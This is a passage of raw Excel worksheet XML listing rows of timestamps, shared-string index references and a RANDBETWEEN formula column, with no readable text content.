        <f t="shared" ca="1" si="315"/>
        <v>1</v>
      </c>
    </row>
    <row r="20188" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20188" s="1">
        <v>43123.374664351853</v>
      </c>
      <c r="C20188" t="s">
        <v>10</v>
      </c>
      <c r="D20188" t="s">
        <v>178</v>
      </c>
      <c r="E20188" t="s">
        <v>18142</v>
      </c>
      <c r="F20188">
        <f t="shared" ca="1" si="315"/>
        <v>1</v>
      </c>
    </row>
    <row r="20189" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20189" s="1">
        <v>43123.334699074076</v>
      </c>
      <c r="C20189" t="s">
        <v>721</v>
      </c>
      <c r="E20189" t="s">
        <v>18143</v>
      </c>
      <c r="F20189">
        <f t="shared" ca="1" si="315"/>
        <v>2</v>
      </c>
    </row>
    <row r="20190" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20190" s="1">
        <v>43123.319398148145</v>
      </c>
      <c r="C20190" t="s">
        <v>318</v>
      </c>
      <c r="E20190" s="2" t="s">
        <v>18144</v>
      </c>
      <c r="F20190">
        <f t="shared" ca="1" si="315"/>
        <v>3</v>
      </c>
    </row>
    <row r="20191" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A20191" s="1">
        <v>43123.315509259257</v>
      </c>
      <c r="C20191" t="s">
        <v>173</v>
      </c>
      <c r="E20191" s="2" t="s">
        <v>18145</v>
      </c>
      <c r="F20191">
        <f t="shared" ca="1" si="315"/>
        <v>4</v>
      </c>
    </row>
    <row r="20192" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20192" s="1">
        <v>43123.301608796297</v>
      </c>
      <c r="C20192" t="s">
        <v>10</v>
      </c>
      <c r="D20192" t="s">
        <v>86</v>
      </c>
      <c r="E20192" t="s">
        <v>18146</v>
      </c>
      <c r="F20192">
        <f t="shared" ca="1" si="315"/>
        <v>4</v>
      </c>
    </row>
    <row r="20193" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20193" s="1">
        <v>43123.279583333337</v>
      </c>
      <c r="C20193" t="s">
        <v>319</v>
      </c>
      <c r="D20193" t="s">
        <v>320</v>
      </c>
      <c r="E20193" s="2" t="s">
        <v>18147</v>
      </c>
      <c r="F20193">
        <f t="shared" ca="1" si="315"/>
        <v>4</v>
      </c>
    </row>
    <row r="20194" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20194" s="1">
        <v>43123.267708333333</v>
      </c>
      <c r="C20194" t="s">
        <v>563</v>
      </c>
      <c r="E20194" t="s">
        <v>18148</v>
      </c>
      <c r="F20194">
        <f t="shared" ca="1" si="315"/>
        <v>1</v>
      </c>
    </row>
    <row r="20195" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20195" s="1">
        <v>43123.254236111112</v>
      </c>
      <c r="C20195" t="s">
        <v>10</v>
      </c>
      <c r="D20195" t="s">
        <v>721</v>
      </c>
      <c r="E20195" t="s">
        <v>18149</v>
      </c>
      <c r="F20195">
        <f t="shared" ca="1" si="315"/>
        <v>4</v>
      </c>
    </row>
    <row r="20196" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20196" s="1">
        <v>43123.249085648145</v>
      </c>
      <c r="C20196" t="s">
        <v>48</v>
      </c>
      <c r="E20196" t="s">
        <v>18150</v>
      </c>
      <c r="F20196">
        <f t="shared" ca="1" si="315"/>
        <v>2</v>
      </c>
    </row>
    <row r="20197" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20197" s="1">
        <v>43123.228368055556</v>
      </c>
      <c r="C20197" t="s">
        <v>559</v>
      </c>
      <c r="E20197" s="2" t="s">
        <v>18151</v>
      </c>
      <c r="F20197">
        <f t="shared" ca="1" si="315"/>
        <v>5</v>
      </c>
    </row>
    <row r="20198" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A20198" s="1">
        <v>43123.217766203707</v>
      </c>
      <c r="C20198" t="s">
        <v>2552</v>
      </c>
      <c r="D20198" t="s">
        <v>290</v>
      </c>
      <c r="E20198" s="2" t="s">
        <v>18152</v>
      </c>
      <c r="F20198">
        <f t="shared" ca="1" si="315"/>
        <v>4</v>
      </c>
    </row>
    <row r="20199" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20199" s="1">
        <v>43123.213229166664</v>
      </c>
      <c r="C20199" t="s">
        <v>41</v>
      </c>
      <c r="E20199" s="2" t="s">
        <v>18153</v>
      </c>
      <c r="F20199">
        <f t="shared" ca="1" si="315"/>
        <v>4</v>
      </c>
    </row>
    <row r="20200" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A20200" s="1">
        <v>43123.206319444442</v>
      </c>
      <c r="C20200" t="s">
        <v>41</v>
      </c>
      <c r="E20200" s="2" t="s">
        <v>18154</v>
      </c>
      <c r="F20200">
        <f t="shared" ca="1" si="315"/>
        <v>2</v>
      </c>
    </row>
    <row r="20201" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20201" s="1">
        <v>43123.204282407409</v>
      </c>
      <c r="C20201" t="s">
        <v>318</v>
      </c>
      <c r="E20201" t="s">
        <v>18155</v>
      </c>
      <c r="F20201">
        <f t="shared" ca="1" si="315"/>
        <v>4</v>
      </c>
    </row>
    <row r="20202" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A20202" s="1">
        <v>43123.177673611113</v>
      </c>
      <c r="C20202" t="s">
        <v>10</v>
      </c>
      <c r="D20202" t="s">
        <v>36</v>
      </c>
      <c r="E20202" s="2" t="s">
        <v>18156</v>
      </c>
      <c r="F20202">
        <f t="shared" ca="1" si="315"/>
        <v>4</v>
      </c>
    </row>
    <row r="20203" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A20203" s="1">
        <v>43123.159108796295</v>
      </c>
      <c r="C20203" t="s">
        <v>454</v>
      </c>
      <c r="E20203" s="2" t="s">
        <v>18157</v>
      </c>
      <c r="F20203">
        <f t="shared" ca="1" si="315"/>
        <v>3</v>
      </c>
    </row>
    <row r="20204" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20204" s="1">
        <v>43123.036273148151</v>
      </c>
      <c r="C20204" t="s">
        <v>10</v>
      </c>
      <c r="D20204" t="s">
        <v>6</v>
      </c>
      <c r="E20204" t="s">
        <v>18158</v>
      </c>
      <c r="F20204">
        <f t="shared" ca="1" si="315"/>
        <v>3</v>
      </c>
    </row>
    <row r="20205" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20205" s="1">
        <v>43123.034699074073</v>
      </c>
      <c r="C20205" t="s">
        <v>139</v>
      </c>
      <c r="E20205" t="s">
        <v>18159</v>
      </c>
      <c r="F20205">
        <f t="shared" ca="1" si="315"/>
        <v>1</v>
      </c>
    </row>
    <row r="20206" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20206" s="1">
        <v>43122.96806712963</v>
      </c>
      <c r="C20206" t="s">
        <v>6</v>
      </c>
      <c r="D20206" t="s">
        <v>821</v>
      </c>
      <c r="E20206" t="s">
        <v>18160</v>
      </c>
      <c r="F20206">
        <f t="shared" ca="1" si="315"/>
        <v>5</v>
      </c>
    </row>
    <row r="20207" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20207" s="1">
        <v>43122.894143518519</v>
      </c>
      <c r="C20207" t="s">
        <v>10</v>
      </c>
      <c r="D20207" t="s">
        <v>17</v>
      </c>
      <c r="E20207" s="2" t="s">
        <v>18161</v>
      </c>
      <c r="F20207">
        <f t="shared" ca="1" si="315"/>
        <v>4</v>
      </c>
    </row>
    <row r="20208" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A20208" s="1">
        <v>43122.8596412037</v>
      </c>
      <c r="C20208" t="s">
        <v>140</v>
      </c>
      <c r="D20208" t="s">
        <v>141</v>
      </c>
      <c r="E20208" s="2" t="s">
        <v>18162</v>
      </c>
      <c r="F20208">
        <f t="shared" ca="1" si="315"/>
        <v>4</v>
      </c>
    </row>
    <row r="20209" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20209" s="1">
        <v>43122.832037037035</v>
      </c>
      <c r="C20209" t="s">
        <v>410</v>
      </c>
      <c r="E20209" t="s">
        <v>18163</v>
      </c>
      <c r="F20209">
        <f t="shared" ca="1" si="315"/>
        <v>4</v>
      </c>
    </row>
    <row r="20210" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20210" s="1">
        <v>43122.795671296299</v>
      </c>
      <c r="C20210" t="s">
        <v>140</v>
      </c>
      <c r="D20210" t="s">
        <v>141</v>
      </c>
      <c r="E20210" s="2" t="s">
        <v>18164</v>
      </c>
      <c r="F20210">
        <f t="shared" ca="1" si="315"/>
        <v>5</v>
      </c>
    </row>
    <row r="20211" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20211" s="1">
        <v>43122.78434027778</v>
      </c>
      <c r="C20211" t="s">
        <v>10</v>
      </c>
      <c r="D20211" t="s">
        <v>23</v>
      </c>
      <c r="E20211" t="s">
        <v>18165</v>
      </c>
      <c r="F20211">
        <f t="shared" ca="1" si="315"/>
        <v>4</v>
      </c>
    </row>
    <row r="20212" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20212" s="1">
        <v>43122.773958333331</v>
      </c>
      <c r="C20212" t="s">
        <v>292</v>
      </c>
      <c r="D20212" t="s">
        <v>124</v>
      </c>
      <c r="E20212" s="2" t="s">
        <v>18166</v>
      </c>
      <c r="F20212">
        <f t="shared" ca="1" si="315"/>
        <v>1</v>
      </c>
    </row>
    <row r="20213" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20213" s="1">
        <v>43122.753182870372</v>
      </c>
      <c r="C20213" t="s">
        <v>10</v>
      </c>
      <c r="D20213" t="s">
        <v>1036</v>
      </c>
      <c r="E20213" t="s">
        <v>18167</v>
      </c>
      <c r="F20213">
        <f t="shared" ca="1" si="315"/>
        <v>4</v>
      </c>
    </row>
    <row r="20214" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20214" s="1">
        <v>43122.727662037039</v>
      </c>
      <c r="C20214" t="s">
        <v>10</v>
      </c>
      <c r="D20214" t="s">
        <v>494</v>
      </c>
      <c r="E20214" t="s">
        <v>18168</v>
      </c>
      <c r="F20214">
        <f t="shared" ca="1" si="315"/>
        <v>5</v>
      </c>
    </row>
    <row r="20215" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20215" s="1">
        <v>43122.714432870373</v>
      </c>
      <c r="C20215" t="s">
        <v>10</v>
      </c>
      <c r="D20215" t="s">
        <v>20</v>
      </c>
      <c r="E20215" t="s">
        <v>18169</v>
      </c>
      <c r="F20215">
        <f t="shared" ca="1" si="315"/>
        <v>2</v>
      </c>
    </row>
    <row r="20216" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20216" s="1">
        <v>43122.702407407407</v>
      </c>
      <c r="C20216" t="s">
        <v>10</v>
      </c>
      <c r="D20216" t="s">
        <v>23</v>
      </c>
      <c r="E20216" t="s">
        <v>18170</v>
      </c>
      <c r="F20216">
        <f t="shared" ca="1" si="315"/>
        <v>4</v>
      </c>
    </row>
    <row r="20217" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20217" s="1">
        <v>43122.693831018521</v>
      </c>
      <c r="C20217" t="s">
        <v>10</v>
      </c>
      <c r="D20217" t="s">
        <v>41</v>
      </c>
      <c r="E20217" s="2" t="s">
        <v>18171</v>
      </c>
      <c r="F20217">
        <f t="shared" ca="1" si="315"/>
        <v>1</v>
      </c>
    </row>
    <row r="20218" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20218" s="1">
        <v>43122.688877314817</v>
      </c>
      <c r="C20218" t="s">
        <v>10</v>
      </c>
      <c r="D20218" t="s">
        <v>20</v>
      </c>
      <c r="E20218" s="2" t="s">
        <v>18172</v>
      </c>
      <c r="F20218">
        <f t="shared" ca="1" si="315"/>
        <v>2</v>
      </c>
    </row>
    <row r="20219" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20219" s="1">
        <v>43122.686631944445</v>
      </c>
      <c r="C20219" t="s">
        <v>10</v>
      </c>
      <c r="D20219" t="s">
        <v>178</v>
      </c>
      <c r="E20219" s="2" t="s">
        <v>18173</v>
      </c>
      <c r="F20219">
        <f t="shared" ca="1" si="315"/>
        <v>5</v>
      </c>
    </row>
    <row r="20220" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20220" s="1">
        <v>43122.682905092595</v>
      </c>
      <c r="C20220" t="s">
        <v>10</v>
      </c>
      <c r="D20220" t="s">
        <v>89</v>
      </c>
      <c r="E20220" t="s">
        <v>18174</v>
      </c>
      <c r="F20220">
        <f t="shared" ca="1" si="315"/>
        <v>5</v>
      </c>
    </row>
    <row r="20221" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20221" s="1">
        <v>43122.681608796294</v>
      </c>
      <c r="C20221" t="s">
        <v>10</v>
      </c>
      <c r="D20221" t="s">
        <v>17</v>
      </c>
      <c r="E20221" s="2" t="s">
        <v>18175</v>
      </c>
      <c r="F20221">
        <f t="shared" ca="1" si="315"/>
        <v>4</v>
      </c>
    </row>
    <row r="20222" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20222" s="1">
        <v>43122.661192129628</v>
      </c>
      <c r="C20222" t="s">
        <v>6</v>
      </c>
      <c r="D20222" t="s">
        <v>25</v>
      </c>
      <c r="E20222" s="2" t="s">
        <v>18176</v>
      </c>
      <c r="F20222">
        <f t="shared" ca="1" si="315"/>
        <v>5</v>
      </c>
    </row>
    <row r="20223" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20223" s="1">
        <v>43122.661076388889</v>
      </c>
      <c r="C20223" t="s">
        <v>6239</v>
      </c>
      <c r="D20223" t="s">
        <v>25</v>
      </c>
      <c r="E20223" t="s">
        <v>18177</v>
      </c>
      <c r="F20223">
        <f t="shared" ca="1" si="315"/>
        <v>1</v>
      </c>
    </row>
    <row r="20224" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20224" s="1">
        <v>43122.652326388888</v>
      </c>
      <c r="C20224" t="s">
        <v>461</v>
      </c>
      <c r="E20224" t="s">
        <v>18178</v>
      </c>
      <c r="F20224">
        <f t="shared" ca="1" si="315"/>
        <v>5</v>
      </c>
    </row>
    <row r="20225" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20225" s="1">
        <v>43122.650046296294</v>
      </c>
      <c r="C20225" t="s">
        <v>10</v>
      </c>
      <c r="D20225" t="s">
        <v>494</v>
      </c>
      <c r="E20225" t="s">
        <v>18179</v>
      </c>
      <c r="F20225">
        <f t="shared" ca="1" si="315"/>
        <v>1</v>
      </c>
    </row>
    <row r="20226" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20226" s="1">
        <v>43122.64434027778</v>
      </c>
      <c r="C20226" t="s">
        <v>10</v>
      </c>
      <c r="D20226" t="s">
        <v>112</v>
      </c>
      <c r="E20226" t="s">
        <v>18180</v>
      </c>
      <c r="F20226">
        <f t="shared" ref="F20226:F20289" ca="1" si="316">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="20227" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20227" s="1">
        <v>43122.623969907407</v>
      </c>
      <c r="C20227" t="s">
        <v>10</v>
      </c>
      <c r="D20227" t="s">
        <v>178</v>
      </c>
      <c r="E20227" t="s">
        <v>18181</v>
      </c>
      <c r="F20227">
        <f t="shared" ca="1" si="316"/>
        <v>1</v>
      </c>
    </row>
    <row r="20228" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A20228" s="1">
        <v>43122.615833333337</v>
      </c>
      <c r="C20228" t="s">
        <v>65</v>
      </c>
      <c r="D20228" t="s">
        <v>312</v>
      </c>
      <c r="E20228" s="2" t="s">
        <v>18182</v>
      </c>
      <c r="F20228">
        <f t="shared" ca="1" si="316"/>
        <v>1</v>
      </c>
    </row>
    <row r="20229" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20229" s="1">
        <v>43122.606759259259</v>
      </c>
      <c r="C20229" t="s">
        <v>10</v>
      </c>
      <c r="D20229" t="s">
        <v>33</v>
      </c>
      <c r="E20229" t="s">
        <v>18183</v>
      </c>
      <c r="F20229">
        <f t="shared" ca="1" si="316"/>
        <v>2</v>
      </c>
    </row>
    <row r="20230" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20230" s="1">
        <v>43122.592280092591</v>
      </c>
      <c r="C20230" t="s">
        <v>6</v>
      </c>
      <c r="D20230" t="s">
        <v>821</v>
      </c>
      <c r="E20230" s="2" t="s">
        <v>18184</v>
      </c>
      <c r="F20230">
        <f t="shared" ca="1" si="316"/>
        <v>5</v>
      </c>
    </row>
    <row r="20231" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20231" s="1">
        <v>43122.592002314814</v>
      </c>
      <c r="C20231" t="s">
        <v>10</v>
      </c>
      <c r="D20231" t="s">
        <v>41</v>
      </c>
      <c r="E20231" s="2" t="s">
        <v>18185</v>
      </c>
      <c r="F20231">
        <f t="shared" ca="1" si="316"/>
        <v>3</v>
      </c>
    </row>
    <row r="20232" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A20232" s="1">
        <v>43122.588136574072</v>
      </c>
      <c r="C20232" t="s">
        <v>6</v>
      </c>
      <c r="D20232" t="s">
        <v>194</v>
      </c>
      <c r="E20232" s="2" t="s">
        <v>18186</v>
      </c>
      <c r="F20232">
        <f t="shared" ca="1" si="316"/>
        <v>5</v>
      </c>
    </row>
    <row r="20233" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20233" s="1">
        <v>43122.573171296295</v>
      </c>
      <c r="C20233" t="s">
        <v>10</v>
      </c>
      <c r="D20233" t="s">
        <v>11</v>
      </c>
      <c r="E20233" s="2" t="s">
        <v>18187</v>
      </c>
      <c r="F20233">
        <f t="shared" ca="1" si="316"/>
        <v>2</v>
      </c>
    </row>
    <row r="20234" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20234" s="1">
        <v>43122.571539351855</v>
      </c>
      <c r="C20234" t="s">
        <v>10</v>
      </c>
      <c r="D20234" t="s">
        <v>178</v>
      </c>
      <c r="E20234" t="s">
        <v>18188</v>
      </c>
      <c r="F20234">
        <f t="shared" ca="1" si="316"/>
        <v>1</v>
      </c>
    </row>
    <row r="20235" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20235" s="1">
        <v>43122.569687499999</v>
      </c>
      <c r="C20235" t="s">
        <v>10</v>
      </c>
      <c r="D20235" t="s">
        <v>1091</v>
      </c>
      <c r="E20235" t="s">
        <v>18189</v>
      </c>
      <c r="F20235">
        <f t="shared" ca="1" si="316"/>
        <v>3</v>
      </c>
    </row>
    <row r="20236" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20236" s="1">
        <v>43122.535509259258</v>
      </c>
      <c r="C20236" t="s">
        <v>10</v>
      </c>
      <c r="D20236" t="s">
        <v>163</v>
      </c>
      <c r="E20236" t="s">
        <v>18190</v>
      </c>
      <c r="F20236">
        <f t="shared" ca="1" si="316"/>
        <v>1</v>
      </c>
    </row>
    <row r="20237" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20237" s="1">
        <v>43122.481631944444</v>
      </c>
      <c r="C20237" t="s">
        <v>48</v>
      </c>
      <c r="E20237" t="s">
        <v>18191</v>
      </c>
      <c r="F20237">
        <f t="shared" ca="1" si="316"/>
        <v>4</v>
      </c>
    </row>
    <row r="20238" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20238" s="1">
        <v>43122.454456018517</v>
      </c>
      <c r="C20238" t="s">
        <v>10</v>
      </c>
      <c r="D20238" t="s">
        <v>11</v>
      </c>
      <c r="E20238" t="s">
        <v>18192</v>
      </c>
      <c r="F20238">
        <f t="shared" ca="1" si="316"/>
        <v>5</v>
      </c>
    </row>
    <row r="20239" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20239" s="1">
        <v>43122.453182870369</v>
      </c>
      <c r="C20239" t="s">
        <v>48</v>
      </c>
      <c r="E20239" t="s">
        <v>18193</v>
      </c>
      <c r="F20239">
        <f t="shared" ca="1" si="316"/>
        <v>4</v>
      </c>
    </row>
    <row r="20240" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20240" s="1">
        <v>43122.439664351848</v>
      </c>
      <c r="C20240" t="s">
        <v>65</v>
      </c>
      <c r="E20240" s="2" t="s">
        <v>18194</v>
      </c>
      <c r="F20240">
        <f t="shared" ca="1" si="316"/>
        <v>3</v>
      </c>
    </row>
    <row r="20241" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A20241" s="1">
        <v>43122.438437500001</v>
      </c>
      <c r="C20241" t="s">
        <v>71</v>
      </c>
      <c r="D20241" t="s">
        <v>312</v>
      </c>
      <c r="E20241" s="2" t="s">
        <v>18195</v>
      </c>
      <c r="F20241">
        <f t="shared" ca="1" si="316"/>
        <v>2</v>
      </c>
    </row>
    <row r="20242" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20242" s="1">
        <v>43122.436886574076</v>
      </c>
      <c r="C20242" t="s">
        <v>6</v>
      </c>
      <c r="D20242" t="s">
        <v>25</v>
      </c>
      <c r="E20242" s="2" t="s">
        <v>18196</v>
      </c>
      <c r="F20242">
        <f t="shared" ca="1" si="316"/>
        <v>2</v>
      </c>
    </row>
    <row r="20243" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20243" s="1">
        <v>43122.420810185184</v>
      </c>
      <c r="C20243" t="s">
        <v>776</v>
      </c>
      <c r="E20243" s="2" t="s">
        <v>18197</v>
      </c>
      <c r="F20243">
        <f t="shared" ca="1" si="316"/>
        <v>4</v>
      </c>
    </row>
    <row r="20244" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A20244" s="1">
        <v>43122.392025462963</v>
      </c>
      <c r="C20244" t="s">
        <v>10</v>
      </c>
      <c r="D20244" t="s">
        <v>89</v>
      </c>
      <c r="E20244" s="2" t="s">
        <v>18198</v>
      </c>
      <c r="F20244">
        <f t="shared" ca="1" si="316"/>
        <v>1</v>
      </c>
    </row>
    <row r="20245" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20245" s="1">
        <v>43122.369189814817</v>
      </c>
      <c r="C20245" t="s">
        <v>69</v>
      </c>
      <c r="E20245" s="2" t="s">
        <v>18199</v>
      </c>
      <c r="F20245">
        <f t="shared" ca="1" si="316"/>
        <v>4</v>
      </c>
    </row>
    <row r="20246" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20246" s="1">
        <v>43122.36681712963</v>
      </c>
      <c r="C20246" t="s">
        <v>82</v>
      </c>
      <c r="E20246" s="2" t="s">
        <v>18200</v>
      </c>
      <c r="F20246">
        <f t="shared" ca="1" si="316"/>
        <v>1</v>
      </c>
    </row>
    <row r="20247" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20247" s="1">
        <v>43122.365277777775</v>
      </c>
      <c r="C20247" t="s">
        <v>10</v>
      </c>
      <c r="D20247" t="s">
        <v>178</v>
      </c>
      <c r="E20247" t="s">
        <v>18201</v>
      </c>
      <c r="F20247">
        <f t="shared" ca="1" si="316"/>
        <v>1</v>
      </c>
    </row>
    <row r="20248" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20248" s="1">
        <v>43122.349039351851</v>
      </c>
      <c r="C20248" t="s">
        <v>731</v>
      </c>
      <c r="E20248" t="s">
        <v>18202</v>
      </c>
      <c r="F20248">
        <f t="shared" ca="1" si="316"/>
        <v>2</v>
      </c>
    </row>
    <row r="20249" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20249" s="1">
        <v>43122.33625</v>
      </c>
      <c r="C20249" t="s">
        <v>14</v>
      </c>
      <c r="F20249">
        <f t="shared" ca="1" si="316"/>
        <v>5</v>
      </c>
    </row>
    <row r="20250" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A20250" s="1">
        <v>43122.295590277776</v>
      </c>
      <c r="C20250" t="s">
        <v>14</v>
      </c>
      <c r="E20250" s="2" t="s">
        <v>18203</v>
      </c>
      <c r="F20250">
        <f t="shared" ca="1" si="316"/>
        <v>5</v>
      </c>
    </row>
    <row r="20251" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20251" s="1">
        <v>43122.247476851851</v>
      </c>
      <c r="C20251" t="s">
        <v>41</v>
      </c>
      <c r="E20251" t="s">
        <v>18204</v>
      </c>
      <c r="F20251">
        <f t="shared" ca="1" si="316"/>
        <v>4</v>
      </c>
    </row>
    <row r="20252" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20252" s="1">
        <v>43122.222118055557</v>
      </c>
      <c r="C20252" t="s">
        <v>124</v>
      </c>
      <c r="E20252" t="s">
        <v>18205</v>
      </c>
      <c r="F20252">
        <f t="shared" ca="1" si="316"/>
        <v>2</v>
      </c>
    </row>
    <row r="20253" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20253" s="1">
        <v>43122.182766203703</v>
      </c>
      <c r="C20253" t="s">
        <v>173</v>
      </c>
      <c r="E20253" s="2" t="s">
        <v>18206</v>
      </c>
      <c r="F20253">
        <f t="shared" ca="1" si="316"/>
        <v>2</v>
      </c>
    </row>
    <row r="20254" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20254" s="1">
        <v>43122.129479166666</v>
      </c>
      <c r="C20254" t="s">
        <v>845</v>
      </c>
      <c r="E20254" t="s">
        <v>18207</v>
      </c>
      <c r="F20254">
        <f t="shared" ca="1" si="316"/>
        <v>5</v>
      </c>
    </row>
    <row r="20255" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20255" s="1">
        <v>43122.128969907404</v>
      </c>
      <c r="C20255" t="s">
        <v>430</v>
      </c>
      <c r="E20255" s="2" t="s">
        <v>18208</v>
      </c>
      <c r="F20255">
        <f t="shared" ca="1" si="316"/>
        <v>3</v>
      </c>
    </row>
    <row r="20256" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20256" s="1">
        <v>43122.108900462961</v>
      </c>
      <c r="C20256" t="s">
        <v>41</v>
      </c>
      <c r="E20256" s="2" t="s">
        <v>18209</v>
      </c>
      <c r="F20256">
        <f t="shared" ca="1" si="316"/>
        <v>1</v>
      </c>
    </row>
    <row r="20257" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20257" s="1">
        <v>43122.103344907409</v>
      </c>
      <c r="C20257" t="s">
        <v>301</v>
      </c>
      <c r="E20257" s="2" t="s">
        <v>18210</v>
      </c>
      <c r="F20257">
        <f t="shared" ca="1" si="316"/>
        <v>1</v>
      </c>
    </row>
    <row r="20258" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20258" s="1">
        <v>43122.093217592592</v>
      </c>
      <c r="C20258" t="s">
        <v>41</v>
      </c>
      <c r="E20258" t="s">
        <v>18211</v>
      </c>
      <c r="F20258">
        <f t="shared" ca="1" si="316"/>
        <v>5</v>
      </c>
    </row>
    <row r="20259" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A20259" s="1">
        <v>43122.092824074076</v>
      </c>
      <c r="C20259" t="s">
        <v>65</v>
      </c>
      <c r="E20259" s="2" t="s">
        <v>18212</v>
      </c>
      <c r="F20259">
        <f t="shared" ca="1" si="316"/>
        <v>4</v>
      </c>
    </row>
    <row r="20260" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20260" s="1">
        <v>43122.061793981484</v>
      </c>
      <c r="C20260" t="s">
        <v>73</v>
      </c>
      <c r="E20260" t="s">
        <v>18213</v>
      </c>
      <c r="F20260">
        <f t="shared" ca="1" si="316"/>
        <v>3</v>
      </c>
    </row>
    <row r="20261" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20261" s="1">
        <v>43122.036134259259</v>
      </c>
      <c r="C20261" t="s">
        <v>410</v>
      </c>
      <c r="E20261" t="s">
        <v>18214</v>
      </c>
      <c r="F20261">
        <f t="shared" ca="1" si="316"/>
        <v>2</v>
      </c>
    </row>
    <row r="20262" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20262" s="1">
        <v>43122.018391203703</v>
      </c>
      <c r="C20262" t="s">
        <v>229</v>
      </c>
      <c r="E20262" t="s">
        <v>18215</v>
      </c>
      <c r="F20262">
        <f t="shared" ca="1" si="316"/>
        <v>3</v>
      </c>
    </row>
    <row r="20263" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20263" s="1">
        <v>43121.956145833334</v>
      </c>
      <c r="C20263" t="s">
        <v>140</v>
      </c>
      <c r="D20263" t="s">
        <v>234</v>
      </c>
      <c r="E20263" t="s">
        <v>18216</v>
      </c>
      <c r="F20263">
        <f t="shared" ca="1" si="316"/>
        <v>1</v>
      </c>
    </row>
    <row r="20264" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20264" s="1">
        <v>43121.940312500003</v>
      </c>
      <c r="C20264" t="s">
        <v>318</v>
      </c>
      <c r="E20264" s="2" t="s">
        <v>18217</v>
      </c>
      <c r="F20264">
        <f t="shared" ca="1" si="316"/>
        <v>3</v>
      </c>
    </row>
    <row r="20265" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20265" s="1">
        <v>43121.924351851849</v>
      </c>
      <c r="C20265" t="s">
        <v>410</v>
      </c>
      <c r="E20265" t="s">
        <v>18218</v>
      </c>
      <c r="F20265">
        <f t="shared" ca="1" si="316"/>
        <v>4</v>
      </c>
    </row>
    <row r="20266" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20266" s="1">
        <v>43121.909247685187</v>
      </c>
      <c r="C20266" t="s">
        <v>139</v>
      </c>
      <c r="D20266" t="s">
